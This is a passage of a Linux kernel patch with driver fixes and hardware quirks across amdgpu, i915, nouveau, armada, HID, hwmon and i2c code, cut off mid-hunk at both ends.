+@@ -272,6 +272,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"IdeaPad Duet 3 10IGL5"),
+ 		},
+ 	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index faff4a3f96e6e..f52d0ba91a770 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -678,6 +678,15 @@ void amdgpu_fence_driver_clear_job_fences(struct amdgpu_ring *ring)
+ 		ptr = &ring->fence_drv.fences[i];
+ 		old = rcu_dereference_protected(*ptr, 1);
+ 		if (old && old->ops == &amdgpu_job_fence_ops) {
++			struct amdgpu_job *job;
++
++			/* For non-scheduler bad job, i.e. failed ib test, we need to signal
++			 * it right here or we won't be able to track them in fence_drv
++			 * and they will remain unsignaled during sa_bo free.
++			 */
++			job = container_of(old, struct amdgpu_job, hw_fence);
++			if (!job->base.s_fence && !dma_fence_is_signaled(old))
++				dma_fence_signal(old);
+ 			RCU_INIT_POINTER(*ptr, NULL);
+ 			dma_fence_put(old);
+ 		}
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 66eb102cd88fb..ddb7b8651ab4c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -1315,6 +1315,11 @@ static int gfx_v11_0_sw_init(void *handle)
+ 		break;
+ 	}
+ 
++	/* Enable CG flag in one VF mode for enabling RLC safe mode enter/exit */
++	if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 3) &&
++		amdgpu_sriov_is_pp_one_vf(adev))
++		adev->cg_flags = AMD_CG_SUPPORT_GFX_CGCG;
++
+ 	/* EOP Event */
+ 	r = amdgpu_irq_add_id(adev, SOC21_IH_CLIENTID_GRBM_CP,
+ 			      GFX_11_0_0__SRCID__CP_EOP_INTERRUPT,
+@@ -4625,6 +4630,14 @@ static bool gfx_v11_0_check_soft_reset(void *handle)
+ 	return false;
+ }
+ 
++static int gfx_v11_0_post_soft_reset(void *handle)
++{
++	/**
++	 * GFX soft reset will impact MES, need resume MES when do GFX soft reset
++	 */
++	return amdgpu_mes_resume((struct amdgpu_device *)handle);
++}
++
+ static uint64_t gfx_v11_0_get_gpu_clock_counter(struct amdgpu_device *adev)
+ {
+ 	uint64_t clock;
+@@ -6096,6 +6109,7 @@ static const struct amd_ip_funcs gfx_v11_0_ip_funcs = {
+ 	.wait_for_idle = gfx_v11_0_wait_for_idle,
+ 	.soft_reset = gfx_v11_0_soft_reset,
+ 	.check_soft_reset = gfx_v11_0_check_soft_reset,
++	.post_soft_reset = gfx_v11_0_post_soft_reset,
+ 	.set_clockgating_state = gfx_v11_0_set_clockgating_state,
+ 	.set_powergating_state = gfx_v11_0_set_powergating_state,
+ 	.get_clockgating_state = gfx_v11_0_get_clockgating_state,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 657e7c7b59e98..43be27c8d2ff3 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -175,6 +175,40 @@ void dm_helpers_dp_update_branch_info(
+ 	const struct dc_link *link)
+ {}
+ 
++static void dm_helpers_construct_old_payload(
++			struct dc_link *link,
++			int pbn_per_slot,
++			struct drm_dp_mst_atomic_payload *new_payload,
++			struct drm_dp_mst_atomic_payload *old_payload)
++{
++	struct link_mst_stream_allocation_table current_link_table =
++									link->mst_stream_alloc_table;
++	struct link_mst_stream_allocation *dc_alloc;
++	int i;
++
++	*old_payload = *new_payload;
++
++	/* Set correct time_slots/PBN of old payload.
++	 * other fields (delete & dsc_enabled) in
++	 * struct drm_dp_mst_atomic_payload are don't care fields
++	 * while calling drm_dp_remove_payload()
++	 */
++	for (i = 0; i < current_link_table.stream_count; i++) {
++		dc_alloc =
++			&current_link_table.stream_allocations[i];
++
++		if (dc_alloc->vcp_id == new_payload->vcpi) {
++			old_payload->time_slots = dc_alloc->slot_count;
++			old_payload->pbn = dc_alloc->slot_count * pbn_per_slot;
++			break;
++		}
++	}
++
++	/* make sure there is an old payload*/
++	ASSERT(i != current_link_table.stream_count);
++
++}
++
+ /*
+  * Writes payload allocation table in immediate downstream device.
+  */
+@@ -186,7 +220,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ {
+ 	struct amdgpu_dm_connector *aconnector;
+ 	struct drm_dp_mst_topology_state *mst_state;
+-	struct drm_dp_mst_atomic_payload *payload;
++	struct drm_dp_mst_atomic_payload *target_payload, *new_payload, old_payload;
+ 	struct drm_dp_mst_topology_mgr *mst_mgr;
+ 
+ 	aconnector = (struct amdgpu_dm_connector *)stream->dm_stream_context;
+@@ -202,17 +236,26 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	mst_state = to_drm_dp_mst_topology_state(mst_mgr->base.state);
+ 
+ 	/* It's OK for this to fail */
+-	payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
+-	if (enable)
+-		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+-	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
++	new_payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
++
++	if (enable) {
++		target_payload = new_payload;
++
++		drm_dp_add_payload_part1(mst_mgr, mst_state, new_payload);
++	} else {
++		/* construct old payload by VCPI*/
++		dm_helpers_construct_old_payload(stream->link, mst_state->pbn_div,
++						new_payload, &old_payload);
++		target_payload = &old_payload;
++
++		drm_dp_remove_payload(mst_mgr, mst_state, &old_payload, new_payload);
++	}
+ 
+ 	/* mst_mgr->->payloads are VC payload notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+ 	 * stream. AMD ASIC stream slot allocation should follow the same
+ 	 * sequence. copy DRM MST allocation to dc */
+-	fill_dc_mst_payload_table_from_drm(stream->link, enable, payload, proposed_table);
++	fill_dc_mst_payload_table_from_drm(stream->link, enable, target_payload, proposed_table);
+ 
+ 	return true;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index bffa6247c3cda..6121005390db4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -61,6 +61,12 @@
+ #define CTF_OFFSET_HOTSPOT		5
+ #define CTF_OFFSET_MEM			5
+ 
++static const int pmfw_decoded_link_speed[5] = {1, 2, 3, 4, 5};
++static const int pmfw_decoded_link_width[7] = {0, 1, 2, 4, 8, 12, 16};
++
++#define DECODE_GEN_SPEED(gen_speed_idx)		(pmfw_decoded_link_speed[gen_speed_idx])
++#define DECODE_LANE_WIDTH(lane_width_idx)	(pmfw_decoded_link_width[lane_width_idx])
++
+ struct smu_13_0_max_sustainable_clocks {
+ 	uint32_t display_clock;
+ 	uint32_t phy_clock;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 508e392547d7a..9431f2cb37776 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1125,8 +1125,8 @@ static int smu_v13_0_0_print_clk_levels(struct smu_context *smu,
+ 					(pcie_table->pcie_lane[i] == 5) ? "x12" :
+ 					(pcie_table->pcie_lane[i] == 6) ? "x16" : "",
+ 					pcie_table->clk_freq[i],
+-					((gen_speed - 1) == pcie_table->pcie_gen[i]) &&
+-					(lane_width == link_width[pcie_table->pcie_lane[i]]) ?
++					(gen_speed == DECODE_GEN_SPEED(pcie_table->pcie_gen[i])) &&
++					(lane_width == DECODE_LANE_WIDTH(link_width[pcie_table->pcie_lane[i]])) ?
+ 					"*" : "");
+ 		break;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 9e1967d8049e3..4399416dd9b8f 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -575,6 +575,14 @@ static int smu_v13_0_7_set_default_dpm_table(struct smu_context *smu)
+ 						     dpm_table);
+ 		if (ret)
+ 			return ret;
++
++		if (skutable->DriverReportedClocks.GameClockAc &&
++			(dpm_table->dpm_levels[dpm_table->count - 1].value >
++			skutable->DriverReportedClocks.GameClockAc)) {
++			dpm_table->dpm_levels[dpm_table->count - 1].value =
++				skutable->DriverReportedClocks.GameClockAc;
++			dpm_table->max = skutable->DriverReportedClocks.GameClockAc;
++		}
+ 	} else {
+ 		dpm_table->count = 1;
+ 		dpm_table->dpm_levels[0].value = smu->smu_table.boot_values.gfxclk / 100;
+@@ -828,6 +836,57 @@ static int smu_v13_0_7_get_smu_metrics_data(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int smu_v13_0_7_get_dpm_ultimate_freq(struct smu_context *smu,
++					     enum smu_clk_type clk_type,
++					     uint32_t *min,
++					     uint32_t *max)
++{
++	struct smu_13_0_dpm_context *dpm_context =
++		smu->smu_dpm.dpm_context;
++	struct smu_13_0_dpm_table *dpm_table;
++
++	switch (clk_type) {
++	case SMU_MCLK:
++	case SMU_UCLK:
++		/* uclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.uclk_table;
++		break;
++	case SMU_GFXCLK:
++	case SMU_SCLK:
++		/* gfxclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.gfx_table;
++		break;
++	case SMU_SOCCLK:
++		/* socclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.soc_table;
++		break;
++	case SMU_FCLK:
++		/* fclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.fclk_table;
++		break;
++	case SMU_VCLK:
++	case SMU_VCLK1:
++		/* vclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.vclk_table;
++		break;
++	case SMU_DCLK:
++	case SMU_DCLK1:
++		/* dclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.dclk_table;
++		break;
++	default:
++		dev_err(smu->adev->dev, "Unsupported clock type!\n");
++		return -EINVAL;
++	}
++
++	if (min)
++		*min = dpm_table->min;
++	if (max)
++		*max = dpm_table->max;
++
++	return 0;
++}
++
+ static int smu_v13_0_7_read_sensor(struct smu_context *smu,
+ 				   enum amd_pp_sensors sensor,
+ 				   void *data,
+@@ -1074,8 +1133,8 @@ static int smu_v13_0_7_print_clk_levels(struct smu_context *smu,
+ 					(pcie_table->pcie_lane[i] == 5) ? "x12" :
+ 					(pcie_table->pcie_lane[i] == 6) ? "x16" : "",
+ 					pcie_table->clk_freq[i],
+-					(gen_speed == pcie_table->pcie_gen[i]) &&
+-					(lane_width == pcie_table->pcie_lane[i]) ?
++					(gen_speed == DECODE_GEN_SPEED(pcie_table->pcie_gen[i])) &&
++					(lane_width == DECODE_LANE_WIDTH(pcie_table->pcie_lane[i])) ?
+ 					"*" : "");
+ 		break;
+ 
+@@ -1329,9 +1388,17 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 				&dpm_context->dpm_tables.fclk_table;
+ 	struct smu_umd_pstate_table *pstate_table =
+ 				&smu->pstate_table;
++	struct smu_table_context *table_context = &smu->smu_table;
++	PPTable_t *pptable = table_context->driver_pptable;
++	DriverReportedClocks_t driver_clocks =
++		pptable->SkuTable.DriverReportedClocks;
+ 
+ 	pstate_table->gfxclk_pstate.min = gfx_table->min;
+-	pstate_table->gfxclk_pstate.peak = gfx_table->max;
++	if (driver_clocks.GameClockAc &&
++		(driver_clocks.GameClockAc < gfx_table->max))
++		pstate_table->gfxclk_pstate.peak = driver_clocks.GameClockAc;
++	else
++		pstate_table->gfxclk_pstate.peak = gfx_table->max;
+ 
+ 	pstate_table->uclk_pstate.min = mem_table->min;
+ 	pstate_table->uclk_pstate.peak = mem_table->max;
+@@ -1348,12 +1415,12 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 	pstate_table->fclk_pstate.min = fclk_table->min;
+ 	pstate_table->fclk_pstate.peak = fclk_table->max;
+ 
+-	/*
+-	 * For now, just use the mininum clock frequency.
+-	 * TODO: update them when the real pstate settings available
+-	 */
+-	pstate_table->gfxclk_pstate.standard = gfx_table->min;
+-	pstate_table->uclk_pstate.standard = mem_table->min;
++	if (driver_clocks.BaseClockAc &&
++		driver_clocks.BaseClockAc < gfx_table->max)
++		pstate_table->gfxclk_pstate.standard = driver_clocks.BaseClockAc;
++	else
++		pstate_table->gfxclk_pstate.standard = gfx_table->max;
++	pstate_table->uclk_pstate.standard = mem_table->max;
+ 	pstate_table->socclk_pstate.standard = soc_table->min;
+ 	pstate_table->vclk_pstate.standard = vclk_table->min;
+ 	pstate_table->dclk_pstate.standard = dclk_table->min;
+@@ -1676,7 +1743,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.dpm_set_jpeg_enable = smu_v13_0_set_jpeg_enable,
+ 	.init_pptable_microcode = smu_v13_0_init_pptable_microcode,
+ 	.populate_umd_state_clk = smu_v13_0_7_populate_umd_state_clk,
+-	.get_dpm_ultimate_freq = smu_v13_0_get_dpm_ultimate_freq,
++	.get_dpm_ultimate_freq = smu_v13_0_7_get_dpm_ultimate_freq,
+ 	.get_vbios_bootup_values = smu_v13_0_get_vbios_bootup_values,
+ 	.read_sensor = smu_v13_0_7_read_sensor,
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+diff --git a/drivers/gpu/drm/armada/armada_drv.c b/drivers/gpu/drm/armada/armada_drv.c
+index 0643887800b4d..142668cd6d7cd 100644
+--- a/drivers/gpu/drm/armada/armada_drv.c
++++ b/drivers/gpu/drm/armada/armada_drv.c
+@@ -99,7 +99,6 @@ static int armada_drm_bind(struct device *dev)
+ 	if (ret) {
+ 		dev_err(dev, "[" DRM_NAME ":%s] can't kick out simple-fb: %d\n",
+ 			__func__, ret);
+-		kfree(priv);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 5522d610c5cfd..b1a38e6ce2f8f 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -328,10 +328,17 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+-	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
++	}, {	/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-		  /* Non exact match to match all versions */
+-		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9"),
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++		  /* Non exact match to match F + L versions */
++		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Tablet 2 830F / 830L */
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index cf5d2f8885f08..c62bb9e2c1743 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -300,9 +300,21 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ {
+ 	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
++	i915_reg_t dss_ctl1_reg, dss_ctl2_reg;
+ 	u32 dss_ctl1;
+ 
+-	dss_ctl1 = intel_de_read(dev_priv, DSS_CTL1);
++	/* FIXME: Move all DSS handling to intel_vdsc.c */
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
++
++		dss_ctl1_reg = ICL_PIPE_DSS_CTL1(crtc->pipe);
++		dss_ctl2_reg = ICL_PIPE_DSS_CTL2(crtc->pipe);
++	} else {
++		dss_ctl1_reg = DSS_CTL1;
++		dss_ctl2_reg = DSS_CTL2;
++	}
++
++	dss_ctl1 = intel_de_read(dev_priv, dss_ctl1_reg);
+ 	dss_ctl1 |= SPLITTER_ENABLE;
+ 	dss_ctl1 &= ~OVERLAP_PIXELS_MASK;
+ 	dss_ctl1 |= OVERLAP_PIXELS(intel_dsi->pixel_overlap);
+@@ -323,16 +335,16 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ 
+ 		dss_ctl1 &= ~LEFT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl1 |= LEFT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		dss_ctl2 = intel_de_read(dev_priv, DSS_CTL2);
++		dss_ctl2 = intel_de_read(dev_priv, dss_ctl2_reg);
+ 		dss_ctl2 &= ~RIGHT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl2 |= RIGHT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		intel_de_write(dev_priv, DSS_CTL2, dss_ctl2);
++		intel_de_write(dev_priv, dss_ctl2_reg, dss_ctl2);
+ 	} else {
+ 		/* Interleave */
+ 		dss_ctl1 |= DUAL_LINK_MODE_INTERLEAVE;
+ 	}
+ 
+-	intel_de_write(dev_priv, DSS_CTL1, dss_ctl1);
++	intel_de_write(dev_priv, dss_ctl1_reg, dss_ctl1);
+ }
+ 
+ /* aka DSI 8X clock */
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index 85a38d794dd9f..c9c9af7956387 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -516,6 +516,14 @@ static void ilk_lut_12p4_pack(struct drm_color_lut *entry, u32 ldw, u32 udw)
+ 
+ static void icl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ {
++	/*
++	 * Despite Wa_1406463849, ICL no longer suffers from the SKL
++	 * DC5/PSR CSC black screen issue (see skl_color_commit_noarm()).
++	 * Possibly due to the extra sticky CSC arming
++	 * (see icl_color_post_update()).
++	 *
++	 * On TGL+ all CSC arming issues have been properly fixed.
++	 */
+ 	icl_load_csc_matrix(crtc_state);
+ }
+ 
+@@ -617,6 +625,28 @@ static void icl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 			  crtc_state->csc_mode);
+ }
+ 
++static void icl_color_post_update(const struct intel_crtc_state *crtc_state)
++{
++	struct intel_crtc *crtc = to_intel_crtc(crtc_state->uapi.crtc);
++	struct drm_i915_private *i915 = to_i915(crtc->base.dev);
++
++	/*
++	 * Despite Wa_1406463849, ICL CSC is no longer disarmed by
++	 * coeff/offset register *writes*. Instead, once CSC_MODE
++	 * is armed it stays armed, even after it has been latched.
++	 * Afterwards the coeff/offset registers become effectively
++	 * self-arming. That self-arming must be disabled before the
++	 * next icl_color_commit_noarm() tries to write the next set
++	 * of coeff/offset registers. Fortunately register *reads*
++	 * do still disarm the CSC. Naturally this must not be done
++	 * until the previously written CSC registers have actually
++	 * been latched.
++	 *
++	 * TGL+ no longer need this workaround.
++	 */
++	intel_de_read_fw(i915, PIPE_CSC_PREOFF_HI(crtc->pipe));
++}
++
+ static struct drm_property_blob *
+ create_linear_lut(struct drm_i915_private *i915, int lut_size)
+ {
+@@ -2345,10 +2375,19 @@ static const struct intel_color_funcs i9xx_color_funcs = {
+ 	.read_luts = i9xx_read_luts,
+ };
+ 
++static const struct intel_color_funcs tgl_color_funcs = {
++	.color_check = icl_color_check,
++	.color_commit_noarm = icl_color_commit_noarm,
++	.color_commit_arm = icl_color_commit_arm,
++	.load_luts = icl_load_luts,
++	.read_luts = icl_read_luts,
++};
++
+ static const struct intel_color_funcs icl_color_funcs = {
+ 	.color_check = icl_color_check,
+ 	.color_commit_noarm = icl_color_commit_noarm,
+ 	.color_commit_arm = icl_color_commit_arm,
++	.color_post_update = icl_color_post_update,
+ 	.load_luts = icl_load_luts,
+ 	.read_luts = icl_read_luts,
+ };
+@@ -2440,7 +2479,9 @@ void intel_color_init_hooks(struct drm_i915_private *i915)
+ 		else
+ 			i915->display.funcs.color = &i9xx_color_funcs;
+ 	} else {
+-		if (DISPLAY_VER(i915) >= 11)
++		if (DISPLAY_VER(i915) >= 12)
++			i915->display.funcs.color = &tgl_color_funcs;
++		else if (DISPLAY_VER(i915) == 11)
+ 			i915->display.funcs.color = &icl_color_funcs;
+ 		else if (DISPLAY_VER(i915) == 10)
+ 			i915->display.funcs.color = &glk_color_funcs;
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c
+index 76678dd60f93f..c4c6f67af7ccc 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c
+@@ -31,6 +31,7 @@ gf108_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gf108_ram_new,
+ 	.default_bigpage = 17,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c
+index f73442ccb424b..433fa966ba231 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c
+@@ -77,6 +77,7 @@ gk104_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gk104_ram_new,
+ 	.default_bigpage = 17,
+ 	.clkgate_pack = gk104_fb_clkgate_pack,
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c
+index 45d6cdffafeed..4dc283dedf8b5 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c
+@@ -59,6 +59,7 @@ gk110_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gk104_ram_new,
+ 	.default_bigpage = 17,
+ 	.clkgate_pack = gk110_fb_clkgate_pack,
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c
+index de52462a92bf0..90bfff616d35b 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c
+@@ -31,6 +31,7 @@ gm107_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gm107_ram_new,
+ 	.default_bigpage = 17,
+ };
+diff --git a/drivers/hid/intel-ish-hid/ishtp/bus.c b/drivers/hid/intel-ish-hid/ishtp/bus.c
+index f68aba8794fe5..d4296681cf720 100644
+--- a/drivers/hid/intel-ish-hid/ishtp/bus.c
++++ b/drivers/hid/intel-ish-hid/ishtp/bus.c
+@@ -241,8 +241,8 @@ static int ishtp_cl_bus_match(struct device *dev, struct device_driver *drv)
+ 	struct ishtp_cl_device *device = to_ishtp_cl_device(dev);
+ 	struct ishtp_cl_driver *driver = to_ishtp_cl_driver(drv);
+ 
+-	return guid_equal(&driver->id[0].guid,
+-			  &device->fw_client->props.protocol_name);
++	return(device->fw_client ? guid_equal(&driver->id[0].guid,
++	       &device->fw_client->props.protocol_name) : 0);
+ }
+ 
+ /**
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 30850a479f61f..87d56f0fc888c 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -537,6 +537,12 @@ static const struct cpu_info cpu_hsx = {
+ 	.thermal_margin_to_millidegree = &dts_eight_dot_eight_to_millidegree,
+ };
+ 
++static const struct cpu_info cpu_skx = {
++	.reg		= &resolved_cores_reg_hsx,
++	.min_peci_revision = 0x33,
++	.thermal_margin_to_millidegree = &dts_ten_dot_six_to_millidegree,
++};
++
+ static const struct cpu_info cpu_icx = {
+ 	.reg		= &resolved_cores_reg_icx,
+ 	.min_peci_revision = 0x40,
+@@ -558,7 +564,7 @@ static const struct auxiliary_device_id peci_cputemp_ids[] = {
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.skx",
+-		.driver_data = (kernel_ulong_t)&cpu_hsx,
++		.driver_data = (kernel_ulong_t)&cpu_skx,
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.icx",
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index d1abea49f01be..78d9f52e2a719 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -698,14 +698,14 @@ static int xgene_hwmon_probe(struct platform_device *pdev)
+ 		ctx->comm_base_addr = pcc_chan->shmem_base_addr;
+ 		if (ctx->comm_base_addr) {
+ 			if (version == XGENE_HWMON_V2)
+-				ctx->pcc_comm_addr = (void __force *)ioremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size);
++				ctx->pcc_comm_addr = (void __force *)devm_ioremap(&pdev->dev,
++								  ctx->comm_base_addr,
++								  pcc_chan->shmem_size);
+ 			else
+-				ctx->pcc_comm_addr = memremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size,
+-							MEMREMAP_WB);
++				ctx->pcc_comm_addr = devm_memremap(&pdev->dev,
++								   ctx->comm_base_addr,
++								   pcc_chan->shmem_size,
++								   MEMREMAP_WB);
+ 		} else {
+ 			dev_err(&pdev->dev, "Failed to get PCC comm region\n");
+ 			rc = -ENODEV;
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index f5c37d2f536bc..e067671b3ce2e 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -316,6 +316,13 @@ static void hisi_i2c_xfer_msg(struct hisi_i2c_controller *ctlr)
+ 		    max_write == 0)
+ 			break;
+ 	}
++
++	/*
++	 * Disable the TX_EMPTY interrupt after finishing all the messages to
++	 * avoid overwhelming the CPU.
++	 */
++	if (ctlr->msg_tx_idx == ctlr->msg_num)
++		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_TX_EMPTY);
+ }
+ 
+ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 9b2f9544c5681..a49b14d52a986 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -463,6 +463,8 @@ static int lpi2c_imx_xfer(struct i2c_adapter *adapter,
+ 		if (num == 1 && msgs[0].len == 0)
+ 			goto stop;
+ 
++		lpi2c_imx->rx_buf = NULL;
++		lpi2c_imx->tx_buf = NULL;
+ 		lpi2c_imx->delivered = 0;
+ 		lpi2c_imx->msglen = msgs[i].len;
+ 		init_completion(&lpi2c_imx->complete);
+diff --git a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+index 09af759211478..b21ffd6df9276 100644
+--- a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
++++ b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+@@ -48,9 +48,9 @@
